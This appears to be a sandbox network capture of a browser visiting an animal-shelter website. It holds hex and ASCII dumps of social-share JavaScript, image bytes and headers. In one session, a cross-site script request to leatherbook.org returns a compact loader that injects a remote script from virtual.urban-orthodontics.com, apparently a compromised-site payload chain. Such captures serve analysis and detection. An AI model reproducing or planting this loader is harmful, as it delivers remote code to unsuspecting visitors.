                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 61 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 2e 69 73 46 75 6c 6c 57 69 64 74 68 29 2c 69 3d 6e 2e 73 68 6f 77 43 6f 75 6e 74 2c 72 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 2e 69 73 56 65 72 74 69 63 61 6c 29 2c 63 3d 74 2e 66 69 6e 64 28 22 2e 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 65 6d 73 22 29 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 72 65 70 6c 61 63 65 28 2f 28 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 65 6d 73 7c 74 76 65 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 29 2f 67 2c 22 22 29 2e 6d 61 74 63 68 28 2f 28 5c 73 2b 29 3f 74 76 65 5f 73 6f 63 69 61 6c 5f 28 5b 61 2d 7a 5d 7b 32 2c 33 7d 29 2f 29 2c 64 3d 63 3f 22 74 76 65 5f 73 6f 63 69 61 6c 5f 22 2b 63 5b 32 5d 3a 22 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 62 22 3b 64 21 3d 3d 73 26 26
                                                                                                                                                                                                                                                        Data Ascii: a=1===parseInt(n.isFullWidth),i=n.showCount,r=1===parseInt(n.isVertical),c=t.find(".tve_social_items").attr("class").replace(/(tve_social_items|tve_social_custom)/g,"").match(/(\s+)?tve_social_([a-z]{2,3})/),d=c?"tve_social_"+c[2]:"tve_social_itb";d!==s&&
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 28 29 2c 64 7d 2c 66 62 5f 73 68 61 72 65 28 74 29 7b 63 6f 6e 73 74 20 6f 3d 74 2e 64 61 74 61 28 29 3b 69 66 28 6f 2e 68 72 65 66 7c 7c 28 6f 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 6f 2e 74 79 70 65 26 26 22 66 65 65 64 22 21 3d 3d 6f 2e 74 79 70 65 29 65 2e 77 6e 64 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 73 68 61 72 65 72 2f 73 68 61 72 65 72 2e 70 68 70 3f 75 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 68 72 65 66 29 2c 36 35 30 2c 35 30 30 29 3b 65 6c 73 65 7b 6c 65 74 20 74 3d 22 22 3b 6f 2e 6e 61 6d 65 26 26 28 74 2b 3d 22 26 74 69 74 6c 65 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 6e 61 6d 65 29 29 2c 6f 2e 64 65 73 63 72 69
                                                                                                                                                                                                                                                        Data Ascii: (),d},fb_share(t){const o=t.data();if(o.href||(o.href=location.href),o.type&&"feed"!==o.type)e.wnd("https://www.facebook.com/sharer/sharer.php?u="+encodeURIComponent(o.href),650,500);else{let t="";o.name&&(t+="&title="+encodeURIComponent(o.name)),o.descri
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 3a 22 22 29 2c 36 30 30 2c 36 30 30 29 7d 2c 78 69 6e 67 5f 73 68 61 72 65 28 74 29 7b 63 6f 6e 73 74 20 6f 3d 74 2e 64 61 74 61 28 29 3b 6f 2e 68 72 65 66 7c 7c 28 6f 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 65 2e 77 6e 64 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 78 69 6e 67 2e 63 6f 6d 2f 73 70 69 2f 73 68 61 72 65 73 2f 6e 65 77 3f 75 72 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 68 72 65 66 29 2c 36 30 30 2c 35 30 30 29 7d 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 65 7d 2c 32 31 37 31 35 3a 74 3d 3e 7b 28 65 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 7b 69 6e 69 74 53 68 61 72 65 43 6f 75 6e 74 73 3a 28 29
                                                                                                                                                                                                                                                        Data Ascii: ="+encodeURIComponent(o.description):""),600,600)},xing_share(t){const o=t.data();o.href||(o.href=location.href),e.wnd("https://www.xing.com/spi/shares/new?url="+encodeURIComponent(o.href),600,500)}};t.exports=e},21715:t=>{(e=>{const o={initShareCounts:()
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 74 2e 63 6f 75 6e 74 73 26 26 74 2e 74 6f 74 61 6c 73 26 26 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 63 6f 6e 73 74 20 6e 3d 65 28 74 68 69 73 29 2c 73 3d 6e 2e 70 72 65 76 28 22 2e 74 76 65 5f 73 5f 73 68 61 72 65 5f 63 6f 75 6e 74 22 29 2c 61 3d 6e 2e 63 68 69 6c 64 72 65 6e 28 22 2e 74 76 65 5f 73 5f 69 74 65 6d 22 29 3b 65 2e 65 61 63 68 28 74 2e 63 6f 75 6e 74 73 5b 6f 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 61 2e 66 69 6c 74 65 72 28 22 2e 74 76 65 5f 73 5f 22 2b 74 29 2e 66 69 6e 64 28 22 2e 74 76 65 5f 73 5f 63 6f 75 6e 74 22 29 2e 68 74 6d 6c 28 65 2e 66 6f 72 6d 61 74 74 65 64 29 7d 29 29 2c 61 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 5f 63 6f 75 6e 74 5f 6c 6f 61 64
                                                                                                                                                                                                                                                        Data Ascii: nction(t){t&&t.counts&&t.totals&&s.each((function(o){const n=e(this),s=n.prev(".tve_s_share_count"),a=n.children(".tve_s_item");e.each(t.counts[o],(function(t,e){a.filter(".tve_s_"+t).find(".tve_s_count").html(e.formatted)})),a.removeClass("tve_count_load
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC25INData Raw: 29 7d 29 28 54 68 72 69 76 65 47 6c 6f 62 61 6c 2e 24 6a 29 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: )})(ThriveGlobal.$j)})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        84192.168.2.449844185.121.15.1374432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC556OUTGET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1
                                                                                                                                                                                                                                                        Host: leatherbook.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC299INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                        Content-Length: 227
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC227INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 75 2c 71 2c 79 2c 64 2c 6e 29 7b 64 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 71 29 3b 6e 3d 75 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 71 29 5b 30 5d 3b 64 2e 61 73 79 6e 63 3d 31 3b 64 2e 73 72 63 3d 79 3b 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 64 2c 6e 29 3b 7d 29 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 76 69 72 74 75 61 6c 2e 75 72 62 61 6e 2d 6f 72 74 68 6f 64 6f 6e 74 69 63 73 2e 63 6f 6d 2f 53 7a 6c 70 6e 54 41 62 43 76 51 76 47 31 4f 76 66 51 70 46 76 7a 6b 62 55 37 38 78 51 41 58 37 4f 31 73 66 76 7a 59 3d 27 29 3b
                                                                                                                                                                                                                                                        Data Ascii: ;(function(u,q,y,d,n){d=u.createElement(q);n=u.getElementsByTagName(q)[0];d.async=1;d.src=y;n.parentNode.insertBefore(d,n);})(document,'script','https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=');


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        85192.168.2.449847192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC638OUTGET /wp-content/uploads/2024/12/dog-day-out2-768x723.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 613496
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/12/dog-day-out2-768x723.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 08 Dec 2024 18:42:35 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC764INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 02 d3 08 06 00 00 00 a1 5c 65 bb 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ec dd 6b ac ed e9 7d d8 f5 ef 73 fb df d6 6d 5f ce 9c 99 39 67 ec 19 c7 f6 d8 8e 8d db 84 d8 6a d2 24 34 6d 69 42 29 2a 2d 48 80 80 00 2a 51 40 a8 ea 0b 04 6f aa 08 21 d4 17 51 c4 8b aa 22 88 57 15 52 41 a0 56 85 17 51 54 0a 2a 88 16 13 dc 26 b2 92 d8 49 1c 5f c6 e3 33 67 ce 65 ef 75 ff df 9e 2b 2f fe eb 78 26 4e 52 3b e9 9c cb cc 3c 1f e9 af bd d7 da 6b af ff 7f df d6 7e 7e cf f3 7b 7e 3f c8 b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 2c cb b2 ec 99 22 9e f6 05 64 59 96 65 ef 3d 29 25 84 10
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR\epHYs+ IDATxk}sm_9gj$4miB)*-H*Q@o!Q"WRAVQT*&I_3geu+/x&NR;<k~~{~?,,,,,,,,,,,,,,"dYe=)%
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e4 e5 00 20 cb b2 ec 29 39 a5 fc fc 04 f0 5f 00 7f 94 77 ef 4c fb bb cd c0 94 e6 f4 37 81 ff 5b 08 f1 e5 a7 7c 3d 59 96 65 4f 54 0e 00 b2 2c cb 9e 82 94 d2 19 f0 17 81 ff 98 69 f0 ff 2c e6 d2 bf d7 ad 99 56 02 fe 1f de aa 26 94 57 05 b2 2c 7b cf cb 01 40 96 65 d9 13 76 1a fc ff 0c f0 6f 32 6d b6 cd 33 ff 4f d7 c0 d4 b3 e0 8a 29 20 f8 b9 bc 2a 90 65 d9 7b 59 0e 00 b2 2c cb 9e 90 53 2d fe 4f 03 7f 1d f8 2c ef 7c 5d fc ec 9f 9d 65 2a 25 fa 57 80 bf cf ef 53 1e 35 cb b2 ec dd 2c bf aa 65 59 f6 54 9c ea cb 57 4c 25 2a 0b a6 f2 94 7b de ea fa fa a8 e3 eb b7 aa b5 9c 3e e7 5b be d3 c0 ec d1 e3 9f 85 01 dc 69 b3 ef 9f 01 7e 8e a9 51 56 f6 6c db 03 7f 0b f8 6f c9 69 41 59 96 bd c7 3c fd ff 8a 59 96 bd 6f 9c 36 bd de 60 6a 1a f5 12 53 ad fb 3f c2 54 57 fe 75 e0 8b
                                                                                                                                                                                                                                                        Data Ascii: )9_wL7[|=YeOT,i,V&W,{@evo2m3O) *e{Y,S-O,|]e*%WS5,eYTWL%*{>[i~QVloiAY<Yo6`jS?TWu
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 05 c2 cc 09 c3 91 30 ee 31 e5 0a 51 35 10 22 42 40 70 1d 22 46 5c 7b 24 0c 3b 10 09 a9 0b 12 82 14 c0 f6 2d c1 f6 44 24 e5 f2 79 46 17 38 5c df c5 f6 5b 24 9e 7a d6 50 d6 0b 8c 51 50 34 c8 ea 9c a2 5a 61 66 37 51 17 1f 42 cf 2f a9 6f bc 8c ae 57 08 a9 9e d6 8f 2c 32 55 0a fa 19 a6 4a 41 43 de 1b 90 65 d9 b3 22 bf 1a 65 d9 fb c8 29 c5 e7 87 80 bf 0c fc 04 53 03 ad ec 19 95 52 24 8c 2d c4 40 fb e0 ab 0c 77 be 80 4c 23 21 25 b4 d6 e8 e6 06 aa 6c 88 42 22 cb 25 4a 97 10 2c a1 7d 48 18 b6 88 14 50 d5 62 9a bb 37 15 52 d5 a4 14 10 ca 20 b5 21 38 8b 48 09 59 d4 20 34 42 19 90 86 24 24 04 37 e5 eb 2b 35 65 15 a5 00 d1 13 fb 3d 21 3a 84 aa 10 42 11 5d 4b 1c 8f c4 61 4d e8 f7 04 24 c1 05 ba ed 03 9a f9 8a d9 e5 2d 42 0c c4 f1 48 b2 3b 42 7b 4d 0c 8e 18 22 63 77 24
                                                                                                                                                                                                                                                        Data Ascii: 01Q5"B@p"F\{$;-D$yF8\[$zPQP4Zaf7QB/oW,2UJACe"e)SR$-@wL#!%lB"%J,}HPb7R !8HY 4B$$7+5e=!:B]KaM$-BH;B{M"cw$
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 09 77 78 88 bf fa 2a de f5 24 21 88 8c 08 01 aa 98 13 45 81 1d 07 b4 2e b1 c3 81 30 f4 34 cb 0b bc ed 39 5e dd 43 eb 82 e8 1d 76 38 d0 b7 2d fd 68 f1 ed 01 a3 35 e5 6c c6 fc f2 45 86 21 e0 da 0d 55 2d 89 08 fa b8 a3 3f be 8e 77 96 7a 3e a7 2c 35 29 26 b4 52 44 3b 10 ac 45 aa 19 c6 18 86 e3 0e a9 04 ca 9d 1a 74 09 90 45 44 11 21 55 98 b2 44 ca 73 b0 06 d7 ef 08 de 12 3d 44 e7 08 43 40 94 86 a2 39 43 99 0a 55 4c 29 3d 8b 0a c2 e5 8c 7e 5c d0 ee 67 ec d6 3b 8e fd c0 fe 68 91 c2 60 8c a4 28 34 cd bc 86 7d 8b 77 01 6f 47 b4 96 2c ea 02 21 35 55 55 53 68 43 a1 f5 94 0a 65 3b 42 4c 08 a9 49 42 63 c7 84 1f 76 28 22 45 b9 41 5f dd 65 7c f8 1a e3 83 6f b0 fc f8 9f a0 3c bf 8d 2a 66 4f 22 10 90 4c ab 71 ff 39 70 96 52 fa 59 e0 b5 dc 38 2c cb b2 27 29 07 00 59 f6 2e
                                                                                                                                                                                                                                                        Data Ascii: wx*$!E.049^Cv8-h5lE!U-?wz>,5)&RD;EtED!UDs=DC@9CUL)=~\g;h`(4}woG,!5UUShCe;BLIBcv("EA_e|o<*fO"Lq9pRY8,')Y.
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 38 eb 29 9b 25 20 88 c9 52 54 73 d0 8a ee c1 6f a3 a4 a4 ac 56 a4 68 09 dd 86 10 22 10 a8 9e fb 08 02 90 a6 44 ca 12 df 6f 31 f3 0b cc fc 12 1f 1c 42 48 08 11 ef 3a a4 50 c4 7e 8b 5e 3e 8f ac e6 53 7a 8a 90 50 d4 48 d3 10 fa 3d d1 1e 51 a6 c6 5c 7e 08 21 0d e8 e2 5b b3 d2 6f 7d 51 6f 7f 3f f0 ad 7c 98 ef ee 1b 42 0a 23 6e f3 1a fd 6b ff 08 55 5f 50 be f4 19 00 a2 6d 41 08 da d7 3e 8f e8 d6 d8 ed 9b d8 e8 19 f6 f7 68 9a 86 dd ae 45 c5 1e a5 15 ca cc 88 1e 94 51 0c b6 a7 32 15 31 09 7a 0b 8b d5 39 b2 d2 28 5d 13 52 44 99 05 5a 57 d4 95 46 c6 16 bb 7f 63 da 4b 20 6a ec f1 1a db 3e 24 c5 44 42 a1 95 46 2a c9 7a bd 67 b7 3d 50 d7 25 cb d5 92 61 e8 a8 ab 39 31 05 74 31 67 b4 81 b6 dd 53 98 8a 66 75 8e 6e ce 28 8a 05 e5 fc 12 35 9b 11 5c cb b8 b9 7b da c4 3b 92
                                                                                                                                                                                                                                                        Data Ascii: 8)% RTsoVh"Do1BH:P~^>SzPH=Q\~![o}Qo?|B#nkU_PmA>hEQ21z9(]RDZWFcK j>$DBF*zg=P%a91t1gSfun(5\{;
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e3 3c 51 96 65 ef 4f b9 0a 50 96 3d 41 a7 ee bc 9f 06 fe 3c d3 a6 de 4f 33 95 f1 7c f6 a5 44 f4 23 c3 c3 d7 b0 db 7b 84 f1 c0 78 fd 3a 69 dc 12 51 54 37 5f c5 79 8f f4 96 34 1c e9 bb 6b c6 76 47 59 56 ec 1e 7e 93 45 55 61 ea 8a a4 2a 86 21 30 5f 94 f8 fe 88 2e b6 24 0f 41 2c f0 ed 06 5d 14 08 ad 41 d7 d8 20 50 52 51 36 2b 76 f7 af a6 c1 ac 4e 0c ed 3d dc 98 68 6e 2c 48 52 23 ec 48 1a a6 5a f5 c2 5b 64 59 13 ba 35 6e 98 f2 e5 a5 9e 52 81 c2 f1 1a a9 6b c4 ec 02 92 23 76 d7 c4 18 91 e5 9c b0 79 80 90 86 14 3c 7a 71 01 c5 9c 64 5b e2 f1 0e b8 23 be db 13 5d c2 9c df 06 7b 44 94 ab a9 b9 d5 70 20 fa 11 55 d6 a0 4b 92 ed 60 dc 93 fa 6b 92 ed f0 fd 1a bb bb c7 30 78 6c 2a 50 76 a0 3c 3c 24 f8 01 10 a4 14 91 42 12 91 60 66 14 b3 15 29 7a fc b8 a1 58 9c 4d 8d bd
                                                                                                                                                                                                                                                        Data Ascii: <QeOP=A<O3|D#{x:iQT7_y4kvGYV~EUa*!0_.$A,]A PRQ6+vN=hn,HR#HZ[dY5nRk#vy<zqd[#]{Dp UK`k0xl*Pv<<$B`f)zXM
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 7a a5 18 5c 60 5e 97 24 21 d9 1c 46 42 ec 18 ac 65 d9 34 bc 78 71 86 52 92 ed 61 a0 73 47 c6 60 99 d7 9a b3 79 45 51 18 2a 53 20 81 45 ad 69 f7 2d cb dd 35 ab f3 7b 34 cb 73 a4 34 cc cf ce 31 cd 92 d9 f9 4d 9a f3 17 58 5d 3c cf c3 e6 9b 1c 37 0f d8 ef ae 71 e3 80 36 9a 61 3c 50 e8 81 b2 2a 99 2f 1a a2 10 1c 8f 03 31 4a ea 26 4d e5 44 8b 86 e5 ac e6 e0 2d be b7 68 a9 a6 75 8f e8 d1 32 b0 6c 0a 16 4d 4d e7 1c d6 7a 92 b3 54 a5 c1 18 85 52 92 04 68 95 28 0a 43 69 34 a4 44 37 78 5c 6f 49 11 bc 83 de 07 46 3b 00 01 6d 04 65 71 a4 3a 6c e9 b7 f7 18 db 1d b7 7f e0 5f c1 34 ab c7 f5 a7 78 06 fc a7 c0 83 94 d2 df ca 25 42 b3 2c 7b a7 e4 3d 00 59 f6 0e 3b 6d ec 7d 09 f8 57 81 bf 00 7c 96 77 c1 6c 3f 00 29 12 c6 96 ee c1 57 70 87 2b 94 ae 88 b6 43 46 8b dd bd 81 3f
                                                                                                                                                                                                                                                        Data Ascii: z\`^$!FBe4xqRasG`yEQ*S Ei-5{4s41MX]<7q6a<P*/1J&MD-hu2lMMzTRh(Ci4D7x\oIF;meq:l_4x%B,{=Y;m}W|wl?)Wp+CF?
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 91 ec 91 14 02 49 14 8c c7 2d c3 61 cf 7e 7b 00 91 a8 eb 12 9f 06 66 8b 4b 50 25 fb 76 47 90 81 98 24 da cc 89 c1 a3 9b 73 74 51 11 fa 1d 7e d8 12 48 20 12 e3 d0 23 a2 60 ff f0 3e 3e 7a bc b7 28 a9 18 ad e5 ec e6 8b 68 51 33 b6 47 84 2e 99 9d dd 64 fb f0 0e 04 4f 51 34 98 72 c9 8b 1f 5c 32 9b cd 70 7e a4 ac 67 08 f5 02 c4 c4 6e fb 15 96 97 97 98 d2 b0 4a 06 bb df e2 8e 1d 4a 6b 46 eb d8 ec 37 b4 fb 81 0f 7f f2 63 c8 e8 e9 f6 1b 86 61 64 b1 5c 52 54 15 c3 e1 21 63 d7 23 78 54 1e 52 93 52 a2 6b 3b c6 71 e0 e2 c6 92 aa 92 5c df bf c3 66 d7 72 71 7e ce d0 77 e8 10 69 ce ce 91 65 83 6b 5b 1e be f9 80 6e f3 90 db 1f bc 81 6b 37 68 b3 a7 5b 3f e0 fa ee 5d 8a 4a 53 2f e7 24 1f 39 1c 07 ee dc 7d 40 74 03 ab e5 0c 53 56 9c 9d 95 78 17 48 62 aa 6f 5f d5 05 52 55 ac
                                                                                                                                                                                                                                                        Data Ascii: I-a~{fKP%vG$stQ~H #`>>z(hQ3G.dOQ4r\2p~gnJJkF7cad\RT!c#xTRRk;q\frq~wiek[nk7h[?]JS/$9}@tSVxHbo_RU
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 94 d2 08 9f f0 d6 93 8c e0 f9 0f 7c 98 76 b7 25 f8 8e 42 1b 08 89 e4 13 e3 76 cd fd 37 df c0 86 03 ab cb e7 28 97 97 1c 1e ae f9 a5 7f fc 45 dc 68 f9 cc a7 3e cc 66 7b a0 7d e3 2e ca cc 59 2e 96 c8 90 40 46 ce 2e ce 18 86 23 a3 9b 66 d3 53 4a 24 e1 51 ca a1 a2 c3 e8 c4 83 87 1b fa e0 b8 38 bb a0 99 2d 09 14 5c 0d 7b ee dc bf 46 13 98 29 c9 e8 03 67 b3 d9 54 e1 a7 f3 04 1f 69 47 cf ae 8f d8 61 7a 4e 89 e0 c6 79 41 10 9a 90 12 3e 4e 41 1e 48 84 10 08 a1 08 21 d2 8e d3 2a 43 3b 3a ec 98 18 93 64 db 8d 14 5a 20 f0 ec ec 48 a9 15 17 cb 05 ab 85 41 4b e8 ed 94 72 75 5e 2f 48 51 a1 a4 40 69 89 34 82 75 ef b0 09 ce 16 86 d5 42 51 d7 15 fd 20 e8 42 22 1e 1c c3 b8 66 7d bd 65 39 6f b8 79 db a2 ab 15 ba 5e b2 ba b8 41 33 9f d3 1d 1f 12 c6 0e 37 0e 94 dd c8 7c 3e 05
                                                                                                                                                                                                                                                        Data Ascii: |v%Bv7(Eh>f{}.Y.@F.#fSJ$Q8-\{F)gTiGazNyA>NAH!*C;:dZ HAKru^/HQ@i4uBQ B"f}e9oy^A37|>
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 34 de 43 6b 23 fb ce 21 85 a0 34 53 47 dc 48 a2 29 0d f3 b2 64 0c 9e 7d ef 48 28 7c 08 f4 76 c4 27 c1 a6 b5 84 20 91 4a 31 2f 0a 7a 67 99 d5 35 75 69 b0 d6 72 68 47 4a 29 a8 8a 84 90 d0 8f 81 d2 c0 cd d5 62 da 28 9e 22 42 c0 6a 39 9f 52 93 82 43 91 d8 77 96 7e 70 3c 7f 31 e3 b9 e5 8c d5 ac a4 ac 34 a3 1b f1 83 a3 a9 0a 2e 96 33 5e 78 fe 26 d5 62 4e 39 5f b2 bc 7c 1e a9 0d ae df 73 dc 3c a4 dd ef d8 6d 36 f8 d0 62 b4 44 0a 81 20 51 68 83 2e 4a 16 cd 1c 5d 48 84 86 e0 05 de ff ff ec bd 49 8c 65 eb 9a 9e f5 fc dd 6a 77 17 4d 46 66 9e 3c cd 3d e7 dc be ec b2 cb 14 c6 46 a6 84 90 65 2c 40 b2 04 0c 2c 84 c4 04 06 16 2a 21 06 08 31 e2 1e 21 84 18 22 81 f0 08 18 31 63 c6 00 3c 42 34 85 85 8d ca e5 e6 de aa 5b f7 b4 79 b2 89 88 1d 3b 76 b3 9a 7f fd 2d 83 95 2e 21
                                                                                                                                                                                                                                                        Data Ascii: 4Ck#!4SGH)d}H(|v' J1/zg5uirhGJ)b("Bj9RCw~p<14.3^x&bN9_|s<m6bD Qh.J]HIejwMFf<=Fe,@,*!1!"1c<B4[y;v-.!


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        86192.168.2.449848192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC425OUTGET /wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
